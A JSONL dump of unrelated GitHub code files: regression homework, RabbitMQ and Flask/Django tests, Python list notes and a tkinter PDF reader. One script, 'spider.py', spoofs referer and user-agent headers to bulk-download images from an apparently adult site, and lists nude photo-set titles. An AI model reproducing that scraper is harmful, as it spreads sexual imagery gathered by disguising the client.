cnt)\n'''","repo_name":"rashmi-fit/coder","sub_path":"pythonBasics/exercise4_listOperation.py","file_name":"exercise4_listOperation.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4628159910","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\nfrom sklearn.neighbors.kde import KernelDensity\n\n# extracting data from the csv file\ndf = pd.read_csv('hw04_data_set.csv', usecols=[\"x\", \"y\"])\n\nX = np.array(df[\"x\"])\nY = np.array(df[\"y\"])\n\n# dividing the data set into two parts by assigning the first 100 data points to the training set and the remaining\n# 33 data points to the test set.\nX_train = X[0:100]\nX_test = X[100:133]\n\nY_train = Y[0:100]\nY_test = Y[100:133]\n\n# setting constants\nN_train = len(X_train)\nN_test = len(X_test)\nminimum_value = 0\nmaximum_value = 60\nbin_width = 3\ndata_interval = np.linspace(minimum_value, maximum_value, 1201)\n\nleft_borders = np.arange(minimum_value, maximum_value, bin_width)\nright_borders = np.arange(minimum_value + bin_width, maximum_value + bin_width, bin_width)\n\n\n# REGRESSOGRAM\n# function for getting probability of each data in data set based on and comparing the training data set with given\n# binwidth\ndef get_p_hat(data_set):\n p_hat = []\n for i in range(len(left_borders)):\n current_sum = 0\n cnt = 0\n for j in range(len(data_set)):\n if left_borders[i] < data_set[j] <= right_borders[i]:\n current_sum += Y_train[j]\n cnt += 1\n if current_sum == 0:\n p_hat.append(0)\n else:\n p_hat.append(round(current_sum / cnt, 4))\n return p_hat\n\n\n# using the function above y_hat values are generated based on X_train\ny_hat = get_p_hat(X_train)\n\n# drawing training data points, test data points, and regressogram in the same figure with bin width 3\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nfor b in range(len(left_borders)):\n plt.plot([left_borders[b], right_borders[b]], [y_hat[b], y_hat[b]], \"k-\")\nfor b in range(len(left_borders) - 1):\n plt.plot([right_borders[b], right_borders[b]], [y_hat[b], y_hat[b + 1]], \"k-\")\nplt.show()\n\n# calculating RMSE of regressogram for test data points\nrmse_regressogram_sum = 0\nfor a in range(len(left_borders)):\n for b in range(len(X_test)):\n if left_borders[a] < X_test[b] <= right_borders[a]:\n rmse_regressogram_sum += (Y_test[b] - y_hat[a]) ** 2\n\nrmse_regressogram = math.sqrt(rmse_regressogram_sum / N_test)\nprint(\"Regressogram => RMSE is \" + str(rmse_regressogram) + \" when h is \" + str(bin_width))\n\n\n# RUNNING MEAN SMOOTHER\n# function for calculating Running Mean Smoother of a given data set using given bin width based on training set\ndef rms_dataset(data_set, bw):\n rms = []\n for i in data_set:\n cur_sum = 0\n cnt = 0\n for j in range(len(X_train)):\n if i - bw / 2 < X_train[j] <= i + bw / 2:\n cur_sum += Y_train[j]\n cnt += 1\n if cnt == 0:\n rms.append(0)\n else:\n rms.append(cur_sum / cnt)\n return rms\n\n\n# Running Mean Smoother for data interval\ndata_interval_rms = rms_dataset(data_interval, bin_width)\n\n# drawing training data points, test data points, and running mean smoother in the same figure\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nplt.plot(data_interval, data_interval_rms, \"k-\", markersize=3)\nplt.show()\n\n# calculating RMSE of running mean smoother for test data points\nrmse_rms_sum = 0\nfor a in range(len(data_interval_rms) - 1):\n for b in range(len(X_test)):\n if data_interval[a] < X_test[b] <= data_interval[a + 1]:\n rmse_rms_sum += (Y_test[b] - data_interval_rms[a]) ** 2\n\nrmse_rms = math.sqrt(rmse_rms_sum / N_test)\nprint(\"Running Mean Smoother => RMSE is \" + str(rmse_rms) + \" when h is \" + str(bin_width))\n\n# KERNEL SMOOTHER\nbin_width_kernel = 1\ndata_interval_kernel = []\nX_train_sorted = sorted(X_train)\nY_train_sorted = sorted(Y_train)\n\n\ndef K(x):\n return math.exp(-(x ** 2) / 2) / math.sqrt(2 * math.pi)\n\n\n# Kernel Smoother for data interval\nfor i in data_interval:\n cur_sum = 0\n general_sum = 0\n for j in range(len(X_train)):\n cur_sum += (K((i - X_train[j]) / bin_width_kernel) * Y_train[j])\n general_sum += K((i - X_train[j]) / bin_width_kernel)\n data_interval_kernel.append(cur_sum / general_sum)\n\n# drawing training data points, test data points, and running mean smoother in the same figure\nplt.figure(figsize=(8, 4))\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.title(\"h=3\")\nplt.plot(X_train, Y_train, \"b.\", markersize=3)\nplt.plot(X_test, Y_test, \"r.\", markersize=3)\nplt.plot(data_interval, data_interval_kernel, \"k-\", markersize=3)\nplt.show()\n\n# calculating the RMSE of kernel smoother for test data points\nrmse_kernel_sum = 0\nfor a in range(len(data_interval_kernel) - 1):\n for b in range(len(X_test)):\n if data_interval[a] < X_test[b] <= data_interval[a + 1]:\n rmse_kernel_sum += (Y_test[b] - data_interval_kernel[a]) ** 2\n\nrmse_kernel_rms = math.sqrt(rmse_kernel_sum / N_test)\nprint(\"Kernel Smoother => RMSE is \" + str(rmse_kernel_rms) + \" when h is \" + str(bin_width_kernel))\n","repo_name":"mburakaltun/ENGR421-Biweekly-Homeworks","sub_path":"Homework 04 - Nonparametric Regression.py","file_name":"Homework 04 - Nonparametric Regression.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30264104571","text":"import asynctest\nfrom fastapi.testclient import TestClient\nimport unittest\nimport os\n\nfrom services.rabbitMQServices import RabbitMQ\nfrom app_core.utils.messagetobase64 import conform_message_response\nfrom main import app\nclass TestRabbitMQIntegration(asynctest.TestCase):\n id_request = None\n\n @classmethod\n def setUpClass(cls):\n #Obtener token\n cls.id_request = None # \"e37d2ec8-b4d0-401d-9b0b-97750bc48c33\" #id de la solicitud\n\n async def test_a_connectMQ(self):\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False)\n\n async def test_b_publish_message_request(self):\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n test_message = {\n \"nombre\": \"Juan\",\n \"edad\": 30,\n \"ciudad\": \"Madrid\"\n }\n #id_request = await self.rabbitmq.publish_message(test_message)\n id_request = await self.rabbitmq.publish_message_request(test_message)\n if id_request is not None and len(id_request) > 0:\n self.__class__.id_request = id_request\n print(f\"Id de la solicitud: {id_request}\")\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False)\n\n async def test_c_publish_message_response(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n test_message = {\n \"analisis_mensaje\": \"Nombre: Juan, Edad: 30, Ciudad: Madrid\",\n \"fecha_análisis\": \"2021-05-01 12:00:00\",\n \"analista\": \"Analista 1\",\n \"resultado\": \"Nombres de personas: 1, Nombres de ciudades: 1, Edades: 1\"\n }\n await self.rabbitmq.publish_message_response(self.id_request,test_message)\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False) \n\n\n async def test_d_consume_messages_request(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n async def callback(message):\n if message.body is not None and len(message.body) > 0:\n #print(f\"Test_d_Mensaje de solicitud: {message.body.decode('utf-8')}\")\n self.assertTrue(True)\n else:\n test_message = {}\n self.assertEqual(message,test_message) \n await self.rabbitmq.consume_message_request(self.id_request,callback)\n await self.rabbitmq.close()\n self.assertTrue(True) \n except Exception as e:\n self.assertTrue(False)\n\n async def test_e_consume_messages_response(self):\n if self.__class__.id_request is None:\n self.skipTest(\"No se ha podido obtener el id de la solicitud\")\n try:\n self.rabbitmq = RabbitMQ()\n await self.rabbitmq.connect()\n async def callback(message):\n if message.body is not None and len(message.body) > 0:\n self.assertTrue(True)\n #print(f\"Mensaje de respuesta: {message.body.decode('utf-8')}\")\n else:\n test_message = {}\n self.assertEqual(message,test_message) \n await self.rabbitmq.consume_message_response(self.id_request,callback)\n await self.rabbitmq.close()\n self.assertTrue(True)\n except Exception as e:\n self.assertTrue(False) \n\nclass TestSecurityRoutes(unittest.TestCase):\n def setUp(self):\n self.client = TestClient(app)\n\n def test_login(self):\n username = os.getenv(\"USERNAME\")\n password = os.getenv(\"PASSWORD\")\n response = self.client.post(f\"/token?username={username}&password={password}\")\n self.assertEqual(response.status_code, 200)\n self.assertIn(\"access_token\", response.json())\n\nclass TestRabbitMQRoutes(unittest.TestCase):\n token = None\n id_request = None\n @classmethod\n def setUpClass(cls):\n cls.client = TestClient(app)\n username = os.getenv(\"USERNAME\")\n password = os.getenv(\"PASSWORD\")\n response = cls.client.post(f\"/token?username={username}&password={password}\") \n cls.token = response.json()[\"access_token\"]\n cls.id_request = None # \"c6dd778a-0aea-4736-85d6-f29a6608abca\" #id de la solicitud\n \n def setUp(self):\n self.client = TestClient(app)\n\n def test_a_publish_message_request(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n # Test publishing a message requesst\n test_message = {\n \"nombre\": \"Juan\",\n \"edad\": 30,\n \"ciudad\": \"Madrid\"\n }\n response_publish = self.client.post(f\"/publicar_mensaje_solicitud\",\n json=test_message,\n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(f\"\\nJSON de Respuesta de publica_mensaje_solicitud:{response_publish.json()}\")\n self.assertEqual(response_publish.status_code, 200)\n self.assertIn(\"id_solicitud\", response_publish.json())\n self.__class__.id_request = response_publish.json()[\"id_solicitud\"]\n #print(f\"Id de la solicitud: {self.__class__.id_request}\")\n\n def test_b_publish_message_response(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test publishing a message response\n test_message = {\n \"analisis_mensaje\": \"Nombre: Juan, Edad: 30, Ciudad: Madrid\",\n \"fecha_análisis\": \"2021-05-01 12:00:00\",\n \"analista\": \"Analista 1\",\n \"resultado\": \"Nombres de personas: 1, Nombres de ciudades: 1, Edades: 1\"\n }\n id_request = self.__class__.id_request\n response_publish = self.client.post(f\"/publicar_mensaje_respuesta/{id_request}\",\n json=test_message,\n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(response_publish)\n self.assertEqual(response_publish.status_code, 200)\n self.assertIn(\"id_solicitud\", response_publish.json())\n #print(response_publish.json())\n self.assertEqual(response_publish.json()[\"id_solicitud\"], id_request)\n \n def test_c_consume_message_request(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test consuming the message of the request\n id_request = self.__class__.id_request\n response_consume = self.client.get(f\"/consumir_mensaje_solicitud/{id_request}\", \n headers={\"Authorization\": f\"Bearer {self.token}\"})\n #print(f\"Response: {response_consume}\") \n #print(f\"Response JSON: {response_consume.json()}\")\n\n #self.assertEqual(response_consume.status_code, 200)\n #self.assertIn(\"request_analisis\", response_consume.json()[\"kind\"])\n\n def test_d_consume_message_response(self):\n if self.__class__.token is None:\n self.skipTest(\"Se requiere un token válido para esta prueba.\")\n if self.__class__.id_request is None:\n self.skipTest(\"Se requiere un id de solicitud válido para esta prueba.\")\n # Test consuming the message of the response\n id_request = self.__class__.id_request\n response_consume = self.client.get(f\"/consumir_mensaje_respuesta/{id_request}\", \n headers={\"Authorization\": f\"Bearer {self.token}\"})\n response_json = response_consume.json()\n if 'estado' in response_json:\n self.assertEqual(response_json, {'estado': 'error', 'detalle': 'no se recibio ningun mensaje'})\n else:\n self.assertEqual(\"response_analisis\", response_json[\"kind\"])\n\nif __name__ == '__main__':\n asynctest.main()\n unittest.main() ","repo_name":"BillyClassTime/AdvancedPython","sub_path":"cp8-PF/apirestfull/test/unit_integration.py","file_name":"unit_integration.py","file_ext":"py","file_size_in_byte":8893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"202458861","text":"# Python List Notes\n\n\n# tuples, lists and strings are sequences **\n# strings are sequences of characters and immutable\n# lists are sequences of any datatype and mutable\n# tuples are sequences of any datatype and immutable\n\n\n# --- LISTS ---\n\n# lists are mutable in python\n# --- CRUD list methods:\n\ndef list_methods():\n # define a list\n fruits = [\"Pineapple\", \"Apple\", \"Banana\", \"Orange\", \"Mango\"]\n print(fruits)\n \n # add to the end of the list\n fruits.append(\"Kiwi\")\n print(fruits)\n # add to the beginning of the list\n fruits.insert(0, \"orange\")\n print(fruits)\n # normally you'd either add to the beginning with insert(0) or the end with append()\n \n # remove the first occurance from the list\n fruits.remove(\"orange\")\n print(fruits)\n \n fruits.pop(2) # removes the item at the index, also returns the item at that index, so you can store it in a variable if needed\n print(fruits)\n \n # replace an item in the list by its index\n fruits[2] = \"Strawberry\"\n print(fruits)\n \n \n# TUPLES \n# Tuples are used when you need to ensure that an element is in a certain position and will not change. order of the elements in a tuple can't be changed, so the position of the element in a tuple can have meaning. When a function returns multiple values, what gets returned is a tuple, with the return values as elements in the tuple. The order of the returned values is important, and a tuple ensures that the order isn’t going to change. Storing the elements of a tuple in separate variables is called unpacking (it works similiar to object destructuring in JavaScript) This allows you to take multiple returned values from a function and store each value in its own variable.\n\ntuple_example = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)\n\ndef convert_seconds(seconds):\n # \n hours = seconds // 3600\n minutes = (seconds - hours * 3600) // 60\n remaining_seconds = seconds - hours * 3600 - minutes * 60\n return hours, minutes, remaining_seconds\n\ndef check_datatype_convert_seconds():\n result = convert_seconds(5000)\n print(type(result)) # \n \n# tuple methods:\n\n# ITERATING OVER A LIST AND TUPLE\n\ndef iterate_list():\n # for each string in the list, get its length and add it to the total\n # len() is used to get length of string and number of elements in the list\n animals = [\"Dog\", \"Cat\", \"Bird\", \"Fish\", \"Snake\"]\n x = 0\n for animal in animals:\n x += len(animal) # length of each string in the list\n \n # len(animals) is used to get the number of elements in the list\n print(f\"Total characters: {x}, Average length: {x / len(animals)}\")\n \ndef enumerate_function():\n # enumerate() takes a list as a parameter and returns a tuple for each element in the list. The first value in the tuple is the index, and the second is the element from the list at that index.\n \n winners = [\"Ashley\", \"Dylan\", \"Reese\"]\n for index, person in enumerate(winners):\n print(f\"{index + 1} -- {person}\")\n \ndef full_emails(people):\n result = []\n for email, name in people:\n result.append(f\"{name} <{email}>\")\n return result\n\n# print(full_emails([(\"alex@example.com\", \"Alex Diego\"), (\"shay@example.com\")]))\n\n# list comprehensions:\n\ndef list_comprehensions():\n multiples = []\n for x in range(1, 11):\n multiples.append(x*7)\n print(multiples)\n \n # or you could do it this way:\n multiples2 = [x*7 for x in range(1, 11)]\n print(multiples2)\n \n # list comprehensions create new lists based on ranges or sequences\n languages = [\"HTML\", \"JavaScript\", \"Python\", \"Ruby\"]\n lengths = [len(language) for language in languages]\n print(\"Lengths of strings in array: \", lengths)\n \n # list comps can use a conditional stmt to filter out values\n divisible_by_3 = [x for x in range(0, 101) if x % 3 == 0]\n print(divisible_by_3)\n \n # create a fn, takes 'n' as arg, returns a list of odd #s btw 1 and n inclusively\ndef odd_nums(n):\n return [ x for x in range(1, n + 1) if x % 2 != 0 ]\n \n # the odd_nums(n) function does the same thing as this long code:\n # my_list = []\n # for x in range(1,101):\n # if x % 10 == 0:\n # my_list.append(x)\n # print(my_list)\n\ndef replace_file_extensions():\n # this uses a list comprehension to replace all \".hpp\" extensions with \".h\"\n filenames = [\"program.c\", \"stdio.hpp\", \"sample.hpp\", \"a.out\", \"math.hpp\", \"hpp.out\"]\n\n newfilenames = [filename.replace(\".hpp\", \".h\") if filename[-4:] == \".hpp\" else filename for filename in filenames]\n\n print(newfilenames)\n\ndef pig_latin():\n text = input(\"Enter a phrase: \")\n words = text.split()\n pig_latin = \"\"\n\n for word in words:\n word = word[1:] + word[0] + \"ay \"\n pig_latin += word\n \n print(pig_latin)\n\n\ndef convert_linux_permissions():\n octal = input(\"Please enter an octal (Ex: 640): \")\n \n result = \"\"\n value_letters = [(4,\"r\"),(2,\"w\"),(1,\"x\")]\n # Iterate over each of the digits in octal\n for digit in [int(n) for n in str(octal)]:\n # Check for each of the permissions values\n for value, letter in value_letters:\n if digit >= value:\n result += letter\n digit -= value\n else:\n result += \"-\"\n\n print(f\"Linux file permissions: {result}\")\n\ndef group_list(group, users):\n return group + \": \" + \", \".join(users)\n\n# print(group_list(\"Marketing\", [\"Mike\", \"Karen\", \"Jake\", \"Tasha\"])) # \"Marketing: Mike, Karen, Jake, Tasha\"\n\ndef guest_list(guests): \n # unpacks each tuple\n\tfor guest in guests:\n\t\t(name, age, job) = guest\n\t\tprint(f\"{name} is {age} years old and works as {job}\")\n\n# guest_list([('Ken', 30, \"Chef\"), (\"Pat\", 35, 'Lawyer'), ('Amanda', 25, \"Engineer\")])\n\n","repo_name":"jroller33/Monty-Python","sub_path":"py crash course/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"26888447780","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom urlshortener.models import ShortUrl\n\nclass SimpleTest(TestCase):\n\n def setUp(self):\n \"\"\"Actions to be performed before each test\"\"\"\n self.data = {'url': 'http://www.google.com',\n 'slug': 'a'}\n\n def tearDown(self):\n \"\"\"Actions to be performed after each test\"\"\"\n ShortUrl.objects.all().delete()\n\n def testUrl(self):\n \"\"\"Test that the url got created properly\"\"\"\n short_url = ShortUrl.objects.create(**self.data)\n self.assertEquals(short_url.slug, 'a')\n self.assertEquals(short_url.clicks, 0)\n result = ShortUrl.objects.all().count()\n self.assertEquals(result, 1)\n\n def testRedirection(self):\n \"\"\"Tests it redirects properly\"\"\"\n ShortUrl.objects.create(**self.data)\n c = Client()\n response = c.get('/a/')\n self.assertEqual(response['Location'], 'http://www.google.com')\n # check the tracking\n short_url = ShortUrl.objects.get(slug='a')\n self.assertEqual(short_url.clicks, 1)\n\n","repo_name":"alfredo/django-urlshortener","sub_path":"src/urlshortener/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"8725164277","text":"# Import statements\nfrom tkinter import Tk, Label, Button, StringVar, LEFT, X, BOTH, Spinbox, END, Frame\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.messagebox import showerror\nfrom tkinter import scrolledtext\nfrom tkinter.ttk import Combobox\nimport pyttsx3\nimport PyPDF2\nfrom time import sleep\n\n# initialization \nengine = pyttsx3.init('sapi5')\nroot = Tk()\nroot.title(\"Pdf Reader\")\nroot.minsize(650, 650)\n\n# file load function\ndef loadPdf():\n\n file = askopenfilename(defaultextension = \".pdf\", filetypes = [(\"pdf files\", \"*.pdf\")])\n \n try:\n book = open(file, 'rb')\n filename = file.split('/')\n title_lbl.config(text=filename[-1])\n\n global pdf\n\n pdf = PyPDF2.PdfFileReader(open(file, 'rb'))\n global pages\n\n pages = pdf.numPages\n\n # print(pages)\n\n pageNum.config(to=pages-1)\n\n pdf_read = pdf.getPage(0)\n global content\n\n content = pdf_read.extractText()\n\n textbox.delete(1.0, END)\n for line in content:\n textbox.insert(END, line)\n except Exception as e:\n print(\"\")\n title_lbl.config(text=\"label\")\n\n# Previous page\ndef prevpage(event):\n global pdf\n try:\n if int(pageNum.get()) == 0:\n return\n else:\n currentPage = int(pageNum.get())-1\n\n if int(currentPage) < 0:\n\n currentPage = 0\n\n pageNum.delete(0,END)\n\n pageNum.insert(END, 0)\n\n # print(currentPage)\n\n pageNum.delete(0, END)\n\n pageNum.insert(END, currentPage)\n\n pdf_read = pdf.getPage(int(currentPage))\n textbox.delete(1.0, END)\n\n global txt\n txt = pdf_read.extractText()\n for line in txt:\n textbox.insert(END, line)\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\ndef nextpage(event):\n global pages, pdf\n try:\n currentPage = int(pageNum.get())+1\n if int(currentPage) > pages:\n currentPage = pages-1\n pageNum.delete(0,END)\n pageNum.insert(END, pages-1)\n\n pageNum.delete(0, END)\n pageNum.insert(END, currentPage)\n\n pdf_read = pdf.getPage(int(currentPage))\n textbox.delete(1.0, END)\n\n global txt\n txt = pdf_read.extractText()\n textbox.insert(END, txt)\n\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\n\ndef goto():\n global pages, pdf\n try:\n goto_page = pageNum.get()\n if int(goto_page) < 0 or int(goto_page) > pages-1:\n showerror(title=\"Page not found\",\n message=\"Enter the valid page number.\")\n else:\n goto_txt = pdf.getPage(int(goto_page))\n textbox.delete(1.0, END)\n global goto_extractTxt\n goto_extractTxt = goto_txt.extractText()\n textbox.insert(END, goto_extractTxt)\n except Exception as e:\n print(\"\")\n showerror(title= \"Error changing page\", message= \"Please load the PDF\")\n\ndef readPdf():\n try:\n readtxt = textbox.get(1.0,END)\n read = engine.say(readtxt)\n\n engine.runAndWait()\n except Exception as e:\n print(\"\")\n showerror(title=\"Error reading the content\", message=\"Unable to read the PDF, Please load the PDF\")\n\n\ntitle_lbl = Label(text=\"label\", bg=\"black\", fg=\"white\")\ntitle_lbl.pack(padx=30, pady=10, ipadx=30, ipady=10, fill=X)\n\ntextbox = scrolledtext.ScrolledText(root, bg=\"white\", fg=\"black\", cursor=\"arrow\",\n font = (\"times new roman\", 10, \"bold\"))\ntextbox.pack(expand =1, fill = BOTH)\n\n\nload_btn = Button(text=\"Load PDF\", bg=\"black\", pady=5, fg=\"white\",command= loadPdf)\nload_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\n\nprevPage_btn = Button(text=\"Previous\", pady=5, bg = \"green\")\nprevPage_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\nprevPage_btn.bind(\"\", prevpage)\n\npageNum = Spinbox(root, from_=0, to=100, increment=1)\npageNum.pack(side=LEFT, expand=1)\n\nnxtPage_btn = Button(text=\"Next\", pady=5, bg = \"green\")\nnxtPage_btn.pack(side=LEFT, expand=1, pady=20, ipadx=10)\nnxtPage_btn.bind(\"\", nextpage)\n\ngoto_btn = Button(text=\"Go To\", bg=\"green\", pady=5, command=goto)\ngoto_btn.pack(side=LEFT, pady=20, ipadx=10)\n\n\nread_btn = Button(text=\"Read Page\", bg=\"black\",padx=10 ,pady=5, fg=\"white\",command= readPdf)\nread_btn.pack(expand=1, padx=20, pady=20, ipadx=10)\n\nroot.mainloop()\n\n","repo_name":"shubhamk2014/AudioBK","sub_path":"AudioBK.py","file_name":"AudioBK.py","file_ext":"py","file_size_in_byte":4495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12855064920","text":"from random import choice\n\nimport pytest\nfrom flask import url_for\n\nfrom registry.donor.models import Batch, Record\nfrom registry.extensions import db\n\nfrom .helpers import login\n\n\nclass TestBatch:\n @pytest.mark.parametrize(\"batch_id\", range(1, 11))\n def test_batch_list(self, user, testapp, batch_id):\n \"\"\"Just a simple test that the detail page loads for some random donors\"\"\"\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n format_time = testapp.app.jinja_env.filters[\"format_time\"]\n assert res.status_code == 200\n batch = db.session.get(Batch, batch_id)\n assert f\">{batch.id}\" in res\n assert f\">{format_time(batch.imported_at)}\" in res\n assert \"\" not in res\n\n @pytest.mark.parametrize(\"unused\", range(1, 6))\n def test_delete_batch(self, user, testapp, unused):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n # Take and submit random form\n form = choice(list(res.forms.values()))\n batch_id = form.fields[\"batch_id\"][0].value\n res = form.submit().follow()\n assert \"Dávka smazána.\" in res\n assert db.session.get(Batch, batch_id) is None\n assert Record.query.filter(Record.batch_id == batch_id).count() == 0\n\n def test_delete_nonexisting_batch(self, user, testapp):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_list\"))\n form = res.forms[0]\n # Modify the form content to point to batch that\n # does not exist.\n form.fields[\"batch_id\"][0].value = 99999\n res = form.submit().follow()\n assert \"Při odebrání dávky došlo k chybě.\" in res\n\n @pytest.mark.parametrize(\"unused\", range(1, 11))\n def test_batch_detail(self, user, testapp, unused):\n login(user, testapp)\n batch_id = choice([b.id for b in Batch.query.all()])\n res = testapp.get(url_for(\"batch.batch_detail\", id=batch_id))\n batch = db.session.get(Batch, batch_id)\n records_count = Record.query.filter(Record.batch_id == batch_id).count()\n if batch.donation_center:\n assert f\"Dávka z {batch.donation_center.title}\" in res\n else:\n assert \"Manuální dávka importována\" in res\n assert res.text.count(\"\") == records_count * res.text.count(\"\")\n\n @pytest.mark.parametrize(\"unused\", range(1, 11))\n def test_download_batch(self, user, testapp, unused):\n login(user, testapp)\n batch_id = choice([b.id for b in Batch.query.all()])\n res = testapp.get(url_for(\"batch.batch_detail\", id=batch_id))\n records_count = Record.query.filter(Record.batch_id == batch_id).count()\n batch_file = res.click(description=\"Stáhnout soubor s dávkou\")\n assert records_count == len(batch_file.text.splitlines())\n assert \";;\" not in batch_file.text\n assert \";\\n\" not in batch_file.text\n\n def test_download_batch_compare_file(self, user, testapp):\n login(user, testapp)\n res = testapp.get(url_for(\"batch.batch_detail\", id=7))\n batch_file = res.click(description=\"Stáhnout soubor s dávkou\")\n with open(\n \"tests/data/batch7_downloaded.txt\", encoding=\"utf-8\", newline=\"\"\n ) as f:\n content_to_compare = f.read()\n assert batch_file.text == content_to_compare\n","repo_name":"frenzymadness/donors_registry","sub_path":"tests/test_batch.py","file_name":"test_batch.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"12800899010","text":"from io import BytesIO\r\nimport requests\r\nfrom PIL import Image\r\n\r\n# img_url = \"https://profile.csdnimg.cn/F/6/F/3_cyj5201314\"\r\n# response = requests.get(img_url)\r\n# f = BytesIO(response.content)\r\n# img = Image.open(f)\r\n# print(img.size)\r\n\r\nimport time\r\nimport random\r\nimport json\r\n\r\n\r\ndef tojson(gid, pages, title):\r\n headers = {\r\n \"referer\": f\"https://xchina.xyz/photo/id-{gid}.html\",\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\"\r\n }\r\n data = {\r\n \"title\": title,\r\n \"gid\": gid,\r\n \"root\": \"https://img.xchina.fun/photos\",\r\n \"data\": []\r\n }\r\n failed = []\r\n for i in range(1, 1+pages):\r\n thumbnail = f\"{i:04d}_300x0.jpg\"\r\n enlarged = f\"{i:04d}.jpg\"\r\n\r\n try:\r\n response = requests.get(f\"{data['root']}/{gid}/{thumbnail}\", headers=headers, timeout=15)\r\n tWidth, tHeight = Image.open(BytesIO(response.content)).size\r\n response = requests.get(f\"https://img.xchina.fun/photos/{gid}/{enlarged}\", headers=headers, timeout=15)\r\n eWidth, eHeight = Image.open(BytesIO(response.content)).size\r\n data[\"data\"].append([thumbnail, tWidth, tHeight, enlarged, eWidth, eHeight])\r\n\r\n print(enlarged, \" done\")\r\n except:\r\n print(enlarged, \"fail..................\")\r\n failed.append(i)\r\n time.sleep(random.random()/3)\r\n\r\n print(failed)\r\n with open(f\"{gid}.json\", 'w') as f:\r\n json.dump(data, f)\r\n print({\"title\": title, \"gid\": gid, \"pages\": pages})\r\n\r\ntojson(\"623073ef02e1c\", 327, \"国模亚美人体私拍套图\")\r\n\r\n\"\"\"\r\n61ff6f9b010ec 国模苏雅大尺度人体私拍套图\r\n614744206f460 国模紫嫣宾馆大尺度人体私拍套图\r\n6148afc303653 国模王小妞宾馆大尺度人体私拍套图\r\n61dab8c2c0b3e 国模李子瑶宾馆大尺度人体私拍套图\r\n61a718ed0ccb7 国模龙馨宾馆大尺度人体私拍套图\r\n61dac848d53d0 国模李梓熙野外大尺度私拍套图\r\n\r\n61c6c28caa317 国模子欣宾馆大尺度人体私拍套图\r\n61eb0967af7e1 国模苏菲亚宾馆人体私拍套图\r\n\"\"\"\r\n","repo_name":"meet-slut/meet-slut.github.io","sub_path":"script/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3563775202","text":"import pytest\nfrom azure.keyvault.secrets import KeyVaultSecretIdentifier\nfrom azure.keyvault.secrets._shared.client_base import DEFAULT_VERSION\nfrom devtools_testutils import recorded_by_proxy\n\nfrom _shared.test_case import KeyVaultTestCase\nfrom _test_case import SecretsClientPreparer\n\n\nclass TestParseId(KeyVaultTestCase):\n @pytest.mark.parametrize(\"api_version\", [(DEFAULT_VERSION)])\n @SecretsClientPreparer()\n @recorded_by_proxy\n def test_parse_secret_id_with_version(self, client, **kwargs):\n secret_name = self.get_resource_name(\"secret\")\n secret_value = \"secret_value\"\n # create secret\n created_secret = client.set_secret(secret_name, secret_value)\n\n # [START parse_key_vault_secret_id]\n secret = client.get_secret(secret_name)\n parsed_secret_id = 